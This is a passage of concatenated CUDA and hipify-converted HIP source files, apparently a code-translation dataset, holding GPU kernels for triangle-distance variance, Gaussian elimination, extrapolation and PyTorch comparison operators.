scalar_t pixel_x = img_pos_bxnx2[bidx][pixel_idx][0]; scalar_t pixel_y = img_pos_bxnx2[bidx][pixel_idx][1]; scalar_t x0 = pixel_x * SCALE; scalar_t y0 = pixel_y * SCALE; scalar_t min_distance = 0.0; scalar_t find_sign = 0.0; scalar_t sum_exp = 0.0; scalar_t max_dist = -MAX_DIS; scalar_t ax, ay, bx, by, cx, cy; scalar_t condition; int img_pos_total_idx = bidx * n_pixel * 2 + pixel_idx * 2; scalar_t ret[3] = {0}; int grididx; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); ax = grid_bxkx3x2[bidx][grididx][0][0] * SCALE; ay = grid_bxkx3x2[bidx][grididx][0][1] * SCALE; bx = grid_bxkx3x2[bidx][grididx][1][0] * SCALE; by = grid_bxkx3x2[bidx][grididx][1][1] * SCALE; cx = grid_bxkx3x2[bidx][grididx][2][0] * SCALE; cy = grid_bxkx3x2[bidx][grididx][2][1] * SCALE; distance(ret, ax, ay, bx, by, cx, cy, x0, y0); condition = ret[0]; min_distance = ret[1]; if (condition < 0) { min_distance = - MAX_DIS; } else if (condition == 0 && find_sign == 0){ min_distance = min_distance / sigma; find_sign == 1; } else{ min_distance = - min_distance / sigma; } max_dist 
= max_dist > min_distance ? max_dist : min_distance; buffer_bxnxk[bidx][pixel_idx][k] = min_distance; } for (int k = 0; k < topk; k++){ buffer_bxnxk[bidx][pixel_idx][k] = expf(buffer_bxnxk[bidx][pixel_idx][k] - max_dist); sum_exp += buffer_bxnxk[bidx][pixel_idx][k]; } scalar_t variance = 0.0; scalar_t grid_f = 0.0; scalar_t pixel_f = 0.0; scalar_t diff = 0.0; scalar_t w = 0.0; scalar_t difference = 0.0; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); int in_sign = 0; if(buffer_bxnxk[bidx][pixel_idx][k] == 1){ in_sign = 1; } buffer_bxnxk[bidx][pixel_idx][k] = buffer_bxnxk[bidx][pixel_idx][k] / (sum_exp + 1e-15); w = buffer_bxnxk[bidx][pixel_idx][k]; difference = 0.0; for (int d = 0; d < d_fea; d++){ grid_f = grid_fea_bxkxd[bidx][grididx][d]; pixel_f = img_fea_bxnxd[bidx][pixel_idx][d]; reconstruct_bxnxd[bidx][pixel_idx][d] += w * grid_f; diff = line_variance_topk_cuda_square(grid_f - pixel_f); difference = difference + diff; } variance = variance + w * difference; if(in_sign == 1){ //hard variance for upsample buffer_bxnxk[bidx][pixel_idx][k] = difference; } else{ buffer_bxnxk[bidx][pixel_idx][k] = 0; } } variance_bxn[bidx][pixel_idx] = variance; } void line_variance_topk_cuda_forward_batch(at::Tensor img_fea_bxnxd, at::Tensor grid_fea_bxkxd, at::Tensor grid_bxkx3x2, at::Tensor img_pos_bxnx2, at::Tensor variance_bxn, float sigma, at::Tensor reconstruct_bxnxd, at::Tensor topk_grid_bxnxk, at::Tensor buffer_bxnxk){ int bnum = grid_bxkx3x2.size(0); int n_pixel = img_pos_bxnx2.size(1); int d_fea = img_fea_bxnxd.size(2); int topk = topk_grid_bxnxk.size(2); // for fxbxhxw image size const int threadnum = 512; const int totalthread = bnum * n_pixel; const int blocknum = totalthread / threadnum + 1; const dim3 threads(threadnum, 1, 1); const dim3 blocks(blocknum, 1, 1); AT_DISPATCH_FLOATING_TYPES(grid_bxkx3x2.type(), "line_variance_topk_cuda_forward_batch", ([&] { hipLaunchKernelGGL(( line_variance_topk_cuda_forward_kernel_batch<scalar_t>), dim3(blocks), dim3(threads), 0, 0, img_fea_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_fea_bxkxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_bxkx3x2.packed_accessor<scalar_t, 4, torch::RestrictPtrTraits, size_t>(), img_pos_bxnx2.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), variance_bxn.packed_accessor<scalar_t, 2, torch::RestrictPtrTraits, size_t>(), reconstruct_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), topk_grid_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), buffer_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), bnum, n_pixel, topk, d_fea, sigma); })); }
95d164da8469151c12074541f08d60ecdebe4aed.cu
#include <ATen/ATen.h> #include <cuda.h> #include <cuda_runtime.h> #include <assert.h> #include <THC/THC.h> #include <vector> #include <torch/torch.h> #include <torch/extension.h> #define eps 1e-10 #define SCALE 1.0 #define MAX_DIS 9999999999.0 //extern THCState * state; template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_abs(scalar_t a){ if (a > 0.0){ return a; } else{ return -a; } } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_square(scalar_t a){ return a * a; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_divide_non_zero(scalar_t a){ if (a == 0){ return eps; } if (a < 0){ return a - eps; } if (a > 0){ return a + eps; } return eps; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; if (b < min_d){ min_d = b; } if (c < min_d){ min_d = c; } return min_d; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis_idx(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; int min_idx = 0; if (b < min_d){ min_d = b; min_idx = 1; } if (c < min_d){ min_d = c; min_idx = 2; } return min_idx; } template <typename scalar_t> __host__ __device__ scalar_t distance_line(scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x, scalar_t y){ scalar_t dx1x2 = -x1 + x2; scalar_t dy1y2 = -y1 + y2; scalar_t dx1x = x - x1; scalar_t dy1y = y - y1; scalar_t c1 = - x * x1 + x * x2 + x1 * x1 - x1 * x2 - y * y1 + y * y2 + y1 * y1 - y1 * y2; scalar_t c2 = x1 * x1 - 2 * x1 * x2 + x2 * x2 + y1 * y1 - 2 * y1 * y2 + y2 * y2; scalar_t d1 = -dx1x + dx1x2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t d2 = -dy1y + dy1y2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t dis = line_variance_topk_cuda_abs(d1) + line_variance_topk_cuda_abs(d2); return dis; } template <typename scalar_t> __host__ __device__ scalar_t distance_point(scalar_t x1, scalar_t y1, scalar_t x, scalar_t y){ return line_variance_topk_cuda_abs(x - x1) + line_variance_topk_cuda_abs(y - y1); } template <typename scalar_t> __host__ __device__ void distance(scalar_t* ret, scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x3, scalar_t y3, scalar_t x, scalar_t y) { //https://en.wikipedia.org/wiki/Barycentric_coordinate_system scalar_t x1_x2 = x1 - x2; scalar_t y1_y2 = y1 - y2; scalar_t x1_x3 = x1 - x3; scalar_t y1_y3 = y1 - y3; scalar_t x2_x3 = x2 - x3; scalar_t y2_y3 = y2 - y3; scalar_t x_x1 = x - x1; scalar_t y_y1 = y - y1; scalar_t x_x2 = x - x2; scalar_t y_y2 = y - y2; scalar_t x_x3 = x - x3; scalar_t y_y3 = y - y3; scalar_t k1 = y2_y3 * x_x3 - x2_x3 * y_y3; scalar_t k2 = x1_x3 * y_y3 - y1_y3 * x_x3; scalar_t k3 = y2_y3 * x1_x3 - x2_x3 * y1_y3; if(k3 == 0){ // not a legal triangle ret[0] = -2; return; } if(k3 > 0){ // clock-wise triangle ret[0] = -1; return; } //scalar_t l1 = k1 / line_variance_topk_cuda_divide_non_zero(k3); //scalar_t l2 = k2 / line_variance_topk_cuda_divide_non_zero(k3); scalar_t l1 = k1 / k3; scalar_t l2 = k2 / k3; scalar_t l3 = 1 - l1 - l2; scalar_t dis12 = distance_line(x1, y1, x2, y2, x, y); scalar_t dis23 = distance_line(x2, y2, x3, y3, x, y); scalar_t dis13 = distance_line(x1, y1, x3, y3, x, y); if (l1 >= 0 && l2 >= 0 && l3 >= 0){ // lie inside or on the boundary scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); ret[0] = 0; ret[1] = min_dis_line; 
ret[2] = min_dis_line_idx; return; } // whether point can calculate distance to certain line bool within12 = ((y1_y2 * y_y1 + x_x1 * x1_x2) * (y1_y2 * y_y2 + x_x2 * x1_x2)) <= 0; bool within23 = ((y2_y3 * y_y3 + x_x3 * x2_x3) * (y2_y3 * y_y2 + x_x2 * x2_x3)) <= 0; bool within13 = ((y1_y3 * y_y1 + x_x1 * x1_x3) * (y1_y3 * y_y3 + x_x3 * x1_x3)) <= 0; dis12 = within12 ? dis12 : MAX_DIS; dis23 = within23 ? dis23 : MAX_DIS; dis13 = within13 ? dis13 : MAX_DIS; scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); scalar_t d1 = distance_point(x1, y1, x, y); scalar_t d2 = distance_point(x2, y2, x, y); scalar_t d3 = distance_point(x3, y3, x, y); scalar_t min_dis_point = line_variance_topk_cuda_min_dis(d1, d2, d3); scalar_t min_dis_point_idx = line_variance_topk_cuda_min_dis_idx(d1, d2, d3); if (min_dis_line < min_dis_point){ ret[0] = 1; ret[1] = min_dis_line; ret[2] = min_dis_line_idx; } else{ ret[0] = 2; ret[1] = min_dis_point; ret[2] = min_dis_point_idx; } } template <typename scalar_t> __global__ void line_variance_topk_cuda_forward_kernel_batch( const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_fea_bxnxd, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> grid_fea_bxkxd, const torch::PackedTensorAccessor<scalar_t, 4, torch::RestrictPtrTraits, size_t> grid_bxkx3x2, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_pos_bxnx2, torch::PackedTensorAccessor<scalar_t, 2, torch::RestrictPtrTraits, size_t> variance_bxn, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> reconstruct_bxnxd, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> topk_grid_bxnxk, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> buffer_bxnxk, int bnum, int n_pixel, int topk, int d_fea, float sigma) { // bidx * height + heiidx int presentthread = blockIdx.x * blockDim.x + threadIdx.x; int pixel_idx = presentthread % n_pixel; int bidx = (presentthread - pixel_idx) / n_pixel; if (bidx >= bnum || pixel_idx >= n_pixel) { return; } ///////////////////////////////////////////////////////////////// // which pixel it belongs to int total_idx = bidx * n_pixel * topk + pixel_idx * topk; scalar_t pixel_x = img_pos_bxnx2[bidx][pixel_idx][0]; scalar_t pixel_y = img_pos_bxnx2[bidx][pixel_idx][1]; scalar_t x0 = pixel_x * SCALE; scalar_t y0 = pixel_y * SCALE; scalar_t min_distance = 0.0; scalar_t find_sign = 0.0; scalar_t sum_exp = 0.0; scalar_t max_dist = -MAX_DIS; scalar_t ax, ay, bx, by, cx, cy; scalar_t condition; int img_pos_total_idx = bidx * n_pixel * 2 + pixel_idx * 2; scalar_t ret[3] = {0}; int grididx; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); ax = grid_bxkx3x2[bidx][grididx][0][0] * SCALE; ay = grid_bxkx3x2[bidx][grididx][0][1] * SCALE; bx = grid_bxkx3x2[bidx][grididx][1][0] * SCALE; by = grid_bxkx3x2[bidx][grididx][1][1] * SCALE; cx = grid_bxkx3x2[bidx][grididx][2][0] * SCALE; cy = grid_bxkx3x2[bidx][grididx][2][1] * SCALE; distance(ret, ax, ay, bx, by, cx, cy, x0, y0); condition = ret[0]; min_distance = ret[1]; if (condition < 0) { min_distance = - MAX_DIS; } else if (condition == 0 && find_sign == 0){ min_distance = min_distance / sigma; find_sign == 1; } else{ min_distance = - min_distance / sigma; } max_dist = max_dist > min_distance ? 
max_dist : min_distance; buffer_bxnxk[bidx][pixel_idx][k] = min_distance; } for (int k = 0; k < topk; k++){ buffer_bxnxk[bidx][pixel_idx][k] = expf(buffer_bxnxk[bidx][pixel_idx][k] - max_dist); sum_exp += buffer_bxnxk[bidx][pixel_idx][k]; } scalar_t variance = 0.0; scalar_t grid_f = 0.0; scalar_t pixel_f = 0.0; scalar_t diff = 0.0; scalar_t w = 0.0; scalar_t difference = 0.0; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); int in_sign = 0; if(buffer_bxnxk[bidx][pixel_idx][k] == 1){ in_sign = 1; } buffer_bxnxk[bidx][pixel_idx][k] = buffer_bxnxk[bidx][pixel_idx][k] / (sum_exp + 1e-15); w = buffer_bxnxk[bidx][pixel_idx][k]; difference = 0.0; for (int d = 0; d < d_fea; d++){ grid_f = grid_fea_bxkxd[bidx][grididx][d]; pixel_f = img_fea_bxnxd[bidx][pixel_idx][d]; reconstruct_bxnxd[bidx][pixel_idx][d] += w * grid_f; diff = line_variance_topk_cuda_square(grid_f - pixel_f); difference = difference + diff; } variance = variance + w * difference; if(in_sign == 1){ //hard variance for upsample buffer_bxnxk[bidx][pixel_idx][k] = difference; } else{ buffer_bxnxk[bidx][pixel_idx][k] = 0; } } variance_bxn[bidx][pixel_idx] = variance; } void line_variance_topk_cuda_forward_batch(at::Tensor img_fea_bxnxd, at::Tensor grid_fea_bxkxd, at::Tensor grid_bxkx3x2, at::Tensor img_pos_bxnx2, at::Tensor variance_bxn, float sigma, at::Tensor reconstruct_bxnxd, at::Tensor topk_grid_bxnxk, at::Tensor buffer_bxnxk){ int bnum = grid_bxkx3x2.size(0); int n_pixel = img_pos_bxnx2.size(1); int d_fea = img_fea_bxnxd.size(2); int topk = topk_grid_bxnxk.size(2); // for fxbxhxw image size const int threadnum = 512; const int totalthread = bnum * n_pixel; const int blocknum = totalthread / threadnum + 1; const dim3 threads(threadnum, 1, 1); const dim3 blocks(blocknum, 1, 1); AT_DISPATCH_FLOATING_TYPES(grid_bxkx3x2.type(), "line_variance_topk_cuda_forward_batch", ([&] { line_variance_topk_cuda_forward_kernel_batch<scalar_t><<<blocks, threads>>>( img_fea_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_fea_bxkxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_bxkx3x2.packed_accessor<scalar_t, 4, torch::RestrictPtrTraits, size_t>(), img_pos_bxnx2.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), variance_bxn.packed_accessor<scalar_t, 2, torch::RestrictPtrTraits, size_t>(), reconstruct_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), topk_grid_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), buffer_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), bnum, n_pixel, topk, d_fea, sigma); })); }
824e226fb231e99a30725919ac302f8808d3c088.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include "cmath" #include <omp.h> using namespace std; #define N 11 #define THREADS_PER_BLOCK 1024 double* create1DArray(); double* malloc_matrix(const int a, const int b) { return (double*)malloc(sizeof(double*) * a * b); } void print(double* mat) { printf("Below is the matrix of linear equation: \n"); int k = 0; for (int i = 0; i < N; i++, printf("\n")) for (int j = 0; j <= N; j++) { printf("%lf ", mat[k]); k++; } printf("\n"); } void printSolution(double* x) { printf("\nSolution for the system:\n"); for (int i = 0; i < N; i++) { int k = (i + 1) * (N + 1); printf("%lf\n", x[k - 1]); } } __global__ void replace_zero_gpu(double* AB, int rows, int columns, int column) { if (fabs(AB[column * columns + column]) <= 1e-4) { int row = column; for (; row < rows; row++) { if (fabs(AB[row * columns + column]) > 1e-4) break; } int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId + column >= columns) return; int zero = column * columns + column + threadId; int chosen = row * columns + column + threadId; AB[zero] += AB[chosen]; } } __global__ void column_elimination_gpu(double* AB, int rows, int columns, int column) { int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId >= (rows - 1 - column) * (columns - column)) return; int el_row = column + threadId / (columns - column) + 1; int el_col = column + threadId % (columns - column); int el = el_col + el_row * columns; int upper_el = el_col + column * columns; int main_el = column + column * columns; int main2_el = column + el_row * columns; double f = AB[main2_el] / AB[main_el]; AB[el] -= f * AB[upper_el]; } __global__ void multiple_column(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; AB[(threadId * columns) + row] *= AB[columns * (row + 1) - 1]; } __global__ void reverse_row_elimination(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int cols = columns - 2 - row; int start_index = row * columns + row + 1; int j = cols % 2; for (int i = cols / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[start_index + threadId] += (AB[start_index + threadId + i + j]); AB[start_index + threadId + i + j] = 0; if (j == 1) i++; j = i % 2; __syncthreads(); } int x_el = (row + 1) * columns - 1; int diag_el = row * columns + row; if (diag_el + 1 != x_el) { AB[x_el] -= AB[diag_el + 1]; AB[diag_el + 1] = 0.0; } AB[x_el] /= AB[diag_el]; AB[diag_el] = 1.0; } __global__ void sum_row(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int j = columns % 2; for (int i = columns / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[threadId] += AB[threadId + i + j]; __syncthreads(); if (j == 1) i++; j = i % 2; } } void start_gaussian_elimination_gpu(double* AB, int rows, int cols) { hipEvent_t start, stop; hipEventCreate(&start); hipEventCreate(&stop); double* AB_gpu; hipMalloc(&AB_gpu, sizeof(double) * rows * cols); hipMemcpy(AB_gpu, (void*)AB, sizeof(double) * rows * cols, hipMemcpyHostToDevice); hipEventRecord(start); for (int column = 0; column < cols - 1; column++) { replace_zero_gpu << <1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); hipDeviceSynchronize(); column_elimination_gpu << < 1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); hipDeviceSynchronize(); } for (int row = rows - 1; row >= 0; row--) { reverse_row_elimination << <1, cols >> > (AB_gpu, rows, cols, row); multiple_column << <1, row >> > 
(AB_gpu, rows, cols, row); hipDeviceSynchronize(); } hipMemcpy(AB, (void*)AB_gpu, sizeof(double) * rows * cols, hipMemcpyDeviceToHost); hipFree(AB_gpu); hipEventRecord(stop); hipEventSynchronize(stop); float milliseconds = 0; hipEventElapsedTime(&milliseconds, start, stop); printf("Elapsed time (s): %.11f\n", milliseconds / 1000); } int main(int argc, char** argv) { int size = N; srand(124); double* AB = create1DArray(); print(AB); start_gaussian_elimination_gpu(AB, size, size + 1); printf("\n\n"); printSolution(AB); return 0; } double* create1DArray() { double* matrix_ab = malloc_matrix(N, N + 1); int k = 0; for (int i = 0; i < N; i++) { for (int j = 0; j < N + 1; j++) { matrix_ab[k] = rand() % 5; if (i == j) { matrix_ab[k] *= -1; } k++; } } return matrix_ab; }
824e226fb231e99a30725919ac302f8808d3c088.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include "cmath" #include <omp.h> using namespace std; #define N 11 #define THREADS_PER_BLOCK 1024 double* create1DArray(); double* malloc_matrix(const int a, const int b) { return (double*)malloc(sizeof(double*) * a * b); } void print(double* mat) { printf("Below is the matrix of linear equation: \n"); int k = 0; for (int i = 0; i < N; i++, printf("\n")) for (int j = 0; j <= N; j++) { printf("%lf ", mat[k]); k++; } printf("\n"); } void printSolution(double* x) { printf("\nSolution for the system:\n"); for (int i = 0; i < N; i++) { int k = (i + 1) * (N + 1); printf("%lf\n", x[k - 1]); } } __global__ void replace_zero_gpu(double* AB, int rows, int columns, int column) { if (fabs(AB[column * columns + column]) <= 1e-4) { int row = column; for (; row < rows; row++) { if (fabs(AB[row * columns + column]) > 1e-4) break; } int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId + column >= columns) return; int zero = column * columns + column + threadId; int chosen = row * columns + column + threadId; AB[zero] += AB[chosen]; } } __global__ void column_elimination_gpu(double* AB, int rows, int columns, int column) { int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId >= (rows - 1 - column) * (columns - column)) return; int el_row = column + threadId / (columns - column) + 1; int el_col = column + threadId % (columns - column); int el = el_col + el_row * columns; int upper_el = el_col + column * columns; int main_el = column + column * columns; int main2_el = column + el_row * columns; double f = AB[main2_el] / AB[main_el]; AB[el] -= f * AB[upper_el]; } __global__ void multiple_column(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; AB[(threadId * columns) + row] *= AB[columns * (row + 1) - 1]; } __global__ void reverse_row_elimination(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int cols = columns - 2 - row; int start_index = row * columns + row + 1; int j = cols % 2; for (int i = cols / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[start_index + threadId] += (AB[start_index + threadId + i + j]); AB[start_index + threadId + i + j] = 0; if (j == 1) i++; j = i % 2; __syncthreads(); } int x_el = (row + 1) * columns - 1; int diag_el = row * columns + row; if (diag_el + 1 != x_el) { AB[x_el] -= AB[diag_el + 1]; AB[diag_el + 1] = 0.0; } AB[x_el] /= AB[diag_el]; AB[diag_el] = 1.0; } __global__ void sum_row(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int j = columns % 2; for (int i = columns / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[threadId] += AB[threadId + i + j]; __syncthreads(); if (j == 1) i++; j = i % 2; } } void start_gaussian_elimination_gpu(double* AB, int rows, int cols) { cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); double* AB_gpu; cudaMalloc(&AB_gpu, sizeof(double) * rows * cols); cudaMemcpy(AB_gpu, (void*)AB, sizeof(double) * rows * cols, cudaMemcpyHostToDevice); cudaEventRecord(start); for (int column = 0; column < cols - 1; column++) { replace_zero_gpu << <1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); cudaThreadSynchronize(); column_elimination_gpu << < 1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); cudaThreadSynchronize(); } for (int row = rows - 1; row >= 0; row--) { reverse_row_elimination << <1, cols >> > (AB_gpu, rows, cols, row); multiple_column << <1, row >> > (AB_gpu, rows, cols, row); cudaThreadSynchronize(); 
} cudaMemcpy(AB, (void*)AB_gpu, sizeof(double) * rows * cols, cudaMemcpyDeviceToHost); cudaFree(AB_gpu); cudaEventRecord(stop); cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); printf("Elapsed time (s): %.11f\n", milliseconds / 1000); } int main(int argc, char** argv) { int size = N; srand(124); double* AB = create1DArray(); print(AB); start_gaussian_elimination_gpu(AB, size, size + 1); printf("\n\n"); printSolution(AB); return 0; } double* create1DArray() { double* matrix_ab = malloc_matrix(N, N + 1); int k = 0; for (int i = 0; i < N; i++) { for (int j = 0; j < N + 1; j++) { matrix_ab[k] = rand() % 5; if (i == j) { matrix_ab[k] *= -1; } k++; } } return matrix_ab; }
6050d0fc68af3fafb31a81652395bf8815ae1492.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "includes.h" __global__ void extrapolate(float* xbar, float* xcur, float* xn, float theta, int w, int h, int nc) { int x = threadIdx.x + blockDim.x * blockIdx.x; int y = threadIdx.y + blockDim.y * blockIdx.y; if (x < w && y < h) { int i; for (int z = 0; z < nc; z++) { i = x + w * y + w * h * z; xbar[i] = xn[i] + theta * (xn[i] - xcur[i]); xcur[i] = xn[i]; } } }
6050d0fc68af3fafb31a81652395bf8815ae1492.cu
#include "includes.h" __global__ void extrapolate(float* xbar, float* xcur, float* xn, float theta, int w, int h, int nc) { int x = threadIdx.x + blockDim.x * blockIdx.x; int y = threadIdx.y + blockDim.y * blockIdx.y; if (x < w && y < h) { int i; for (int z = 0; z < nc; z++) { i = x + w * y + w * h * z; xbar[i] = xn[i] + theta * (xn[i] - xcur[i]); xcur[i] = xn[i]; } } }
4635c217850a2677bcccfc05c6966018029a2443.hip
// !!! This is a file automatically generated by hipify!!! #include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/native/BinaryOps.h> #include <ATen/native/DispatchStub.h> #include <ATen/native/TensorIterator.h> #include <ATen/native/hip/Loops.cuh> #include <ATen/native/hip/zmath.cuh> // NOTE: CUDA on Windows requires that the enclosing function // of a __device__ lambda not have internal linkage. namespace at { namespace native { void lt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "lt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a < b; }); }); } void le_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "le_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a <= b; }); }); } void gt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "gt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a > b; }); }); } void ge_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "ge_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a >= b; }); }); } void eq_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "eq_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a == b; }); }); } void ne_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "ne_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a != b; }); }); } void max_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a || b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::max(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::max(a, b); } }); }); } } void min_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a && b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::min(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. 
using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::min(a, b); } }); }); } } REGISTER_DISPATCH(lt_stub, &lt_kernel_cuda); REGISTER_DISPATCH(le_stub, &le_kernel_cuda); REGISTER_DISPATCH(gt_stub, &gt_kernel_cuda); REGISTER_DISPATCH(ge_stub, &ge_kernel_cuda); REGISTER_DISPATCH(eq_stub, &eq_kernel_cuda); REGISTER_DISPATCH(ne_stub, &ne_kernel_cuda); REGISTER_DISPATCH(max_elementwise_stub, &max_elementwise_kernel_cuda); REGISTER_DISPATCH(min_elementwise_stub, &min_elementwise_kernel_cuda); }} // namespace at::native
4635c217850a2677bcccfc05c6966018029a2443.cu
